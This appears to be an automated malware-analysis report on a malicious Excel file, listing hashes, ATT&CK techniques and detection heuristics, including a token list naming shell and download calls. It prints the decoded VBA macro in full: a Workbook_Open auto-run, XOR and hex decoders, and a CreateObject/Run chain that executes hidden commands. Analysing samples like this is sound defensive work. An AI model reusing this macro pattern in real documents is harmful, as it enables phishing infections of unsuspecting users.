Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 7c072e0cece37868…

Verdict: MALICIOUS
File type: Office (OLE) / .XLS
Size: 39.5 KB
Created: 2023-07-04 22:31:07
Authoring application: Microsoft Excel
First seen: 2023-07-08
MD5: 30815b255690ba7038ee66e5fd9515fa
SHA-1: 59ce2dc4964fcc4950642bc970afe1c191bdc9c9
SHA-256: 7c072e0cece37868b70728a2129a37905e2cbf4a4e09d0eb52b024743d6dfafa
Risk score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. The heuristics indicate the use of CreateObject and GetObject, suggesting the macro attempts to instantiate and run objects. The VBA code, though obfuscated, contains a subroutine named 'PhiliP' which takes an object and a string argument, and calls the 'Run' method on the object with the string. This strongly suggests the macro is designed to download and execute a second-stage payload. The lack of specific IOCs beyond the macro name and the obfuscated nature of the script prevent a higher confidence score or family attribution.

Heuristics 5

  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set Suffering = GetObject(Crossing).CreateObject(Methodology)
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
    Matched line in script:
    Set Suffering = GetObject(Crossing).CreateObject(Methodology)
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (low) OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4253 bytes
SHA-256: 38efc687d8b28ed06d8f3143993d5d81afd4d7866e58b267d75767edff621d98

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Suffering As Object   ' module-level slot for the COM object created in GanGbanG

' Orchestrator: builds the COM object from the two decoded strings (moniker, ProgID),
' then hands the third decoded string to that object's Run method.
Private Sub Discipline(ByVal Crossing As String, ByVal Chains As String, ByVal Methodology As String, ByVal Vitamin As String)
GanGbanG Crossing, Methodology
PhiliP Suffering, Vitamin, Chains
End Sub

' Invokes Run on the object with the decoded string and a second argument of 0.
' Vitamin is accepted but never used.
Sub PhiliP(ByVal Suffering As Object, ByVal Vitamin As String, ByVal Chains As String)
Suffering.Run Chains, 0
End Sub

' String decoder. Converts a hex string taken from a worksheet cell to bytes
' (via ActivAtion), then XORs each byte with the repeating 10-character key
' "k1a39af4d6". The GoTo labels scramble the control flow; in reading order it
' is a plain loop over the byte array.
Private Function Cooperative(ByVal Mozilla As String) As Variant
Dim Sigma As Long: Sigma = 0: Dim Algorithms() As Byte
Dim Fonts() As Byte, Brush As String, Parenting As Integer, Trunk As Integer, EntitiEs As Integer
' Assigning a String to a Byte array yields its UTF-16 bytes, so the key
' characters sit at even offsets (hence the "Parenting * 2" index below).
Fonts = "k1a39af4d6"
GoTo Invest
Hospitality:
If Sigma < UBound(Algorithms) Then
Parenting = Sigma Mod (10)             ' key index: byte position mod key length
EntitiEs = Fonts(Parenting * 2)        ' key byte
Trunk = Algorithms(Sigma)              ' encoded byte
GoTo Induced
Workforce:
Brush = Brush & Chr(Algorithms(Sigma)) ' append the decoded character
Sigma = Sigma + 1
GoTo Hospitality
Else
GoTo Mobility
End If
Mobility:
Cooperative = Brush
Exit Function
Invest:
Algorithms = ActivAtion(Mozilla)       ' hex string -> byte array
GoTo Hospitality
Induced:
Algorithms(Sigma) = Abs(Trunk Xor EntitiEs)   ' XOR with the key byte
GoTo Workforce
End Function

' Creates the COM object as GetObject(<moniker>).CreateObject(<ProgID>).
' Neither string appears in cleartext in the macro; both are decoded from cells.
Sub GanGbanG(ByVal Crossing As String, ByVal Methodology As String)
Set Suffering = GetObject(Crossing).CreateObject(Methodology)
End Sub

' Auto-exec entry point. All four arguments are decoded from cells on the
' worksheet "gc28" (G114, E148, E161, F196).
Sub Workbook_Open()
Discipline Cooperative(Sheets("gc28").Range("G114").Value), Cooperative(Sheets("gc28").Range("E148").Value), Cooperative(Sheets("gc28").Range("E161").Value), Cooperative(Sheets("gc28").Range("F196").Value)
End Sub

' Hex decoder. For each pair of hex digits it builds the literal "&H" & pair
' (the two Chr() expressions evaluate to 38 = "&" and 72 = "H") and assigns it
' to a Byte, which VBA coerces from the hex-literal string to its numeric value.
Private Function ActivAtion(ByVal Spectacular As String) As Variant
Dim Brush() As Byte, i As Long, Parenting As Integer, Anymore As Integer
Anymore = Len(Spectacular) / 2: i = 0: ReDim Brush(0 To Anymore) As Byte
EntitiEs:
If i < Len(Spectacular) Then
Parenting = Parenting + 1
Brush(Parenting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Spectacular, i + 1, 2)
i = i + 2
GoTo EntitiEs
Else
GoTo Shelf
' Dead code: unreachable because of the GoTo above; junk inserted as filler.
Dim Induced As String
Induced = InputBox("celp lape")
End If
Shelf:
ActivAtion = Brush
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True